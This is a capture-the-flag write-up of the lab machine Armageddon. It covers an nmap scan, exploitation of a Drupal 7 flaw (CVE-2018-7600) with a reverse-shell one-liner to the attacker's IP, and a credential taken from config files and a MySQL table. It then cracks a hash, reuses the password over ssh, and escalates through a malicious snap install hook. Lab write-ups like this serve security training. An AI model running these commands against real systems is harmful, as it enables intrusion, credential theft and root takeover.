Armageddon - Writeup
Armageddon
Reconnaissance
IP: 10.10.10.233
NMAP
nmap -T4 -p- -A 10.10.10.233
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-26 05:56 EDT
Nmap scan report for 10.10.10.233
Host is up (0.030s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA)
| 256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA)
|_ 256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-generator: Drupal 7 (http://drupal.org)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Welcome to Armageddon | Armageddon
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11
Network Distance: 2 hops
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 29.51 ms 10.10.14.1
2 29.83 ms 10.10.10.233
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.99 seconds
2 ports open so start with 80
Website
Site
From nmap we know some directories and that cms is Drupal 7 Last update 7.56, so I let’s use drupalgeddon2 https://github.com/lorddemon/drupalgeddon2
Gaining Access
looks like it is working
cant hit rev shell so switch to https://github.com/pimps/CVE-2018-7600.git
python3 drupa7-CVE-2018-7600.py http://10.10.10.233 -c 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1'
We have reverse shell
can’t do to much with this user, so let’s try to search for passowods in config files
grep -ri "password" /var/www/html
using cat we can see username for mysql db
Now enumerate mysql with this credentials. I fount table users and password here.
mysql -e 'select * from users;' -u drupaluser -p'CQHEy@9M*m23gBVj' drupal
We have bruce admin account with hashed password. hashcat recognize this hash as module 7900 and cracked it
We have password reused to ssh
Privilege Escalation
Starting with sudo -l we see that bruce can sudo with snap
https://gtfobins.github.io/gtfobins/snap/
no root shell but command was executed so, let’s edit command form gtfobins to read root.txt flag:
COMMAND='cat /root/root.txt'
cd $(mktemp -d)
mkdir -p meta/hooks
printf '#!/bin/sh\n%s; false' "$COMMAND" >meta/hooks/install
chmod +x meta/hooks/install
fpm -n xxxx -s dir -t snap -a all meta
and we got it.